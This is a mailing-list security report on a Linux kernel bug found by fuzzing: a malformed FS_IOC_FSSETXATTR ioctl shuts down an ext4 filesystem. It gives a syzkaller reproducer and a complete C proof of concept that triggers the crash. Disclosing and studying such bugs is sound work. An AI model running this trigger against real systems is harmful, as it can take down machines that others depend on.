Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down
From: zhrzhang(张洪睿) <zhrzhang () tencent com>
Date: Tue, 28 Aug 2018 08:27:50 +0000
Hello: while fuzzing, I found that the kernel would stop producing any output from the machine, and an erroneous FS_IOC_FSSETXATTR call contributes to this. The syzkaller log is as follows:

r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})

That is, the ioctl is given a struct fsxattr whose members are all zero except the fourth (fsx_projid), which is set to 8. The PoC looks like this:

#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

uint64_t r[1] = {0xffffffffffffffff};

int main(void)
{
    syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
    long res = 0;
    memcpy((void*)0x20000140, "./file0", 8);
    res = syscall(__NR_creat, 0x20000140, 0);
    if (res != -1)
        r[0] = res;
    *(uint32_t*)0x20000080 = 0;
    *(uint32_t*)0x20000084 = 0;
    *(uint32_t*)0x20000088 = 0;
    *(uint32_t*)0x2000008c = 8;
    *(uint32_t*)0x20000090 = 0;
    *(uint64_t*)0x20000098 = 0;
    syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
    return 0;
}

________________________________
zhrzhang(张洪睿)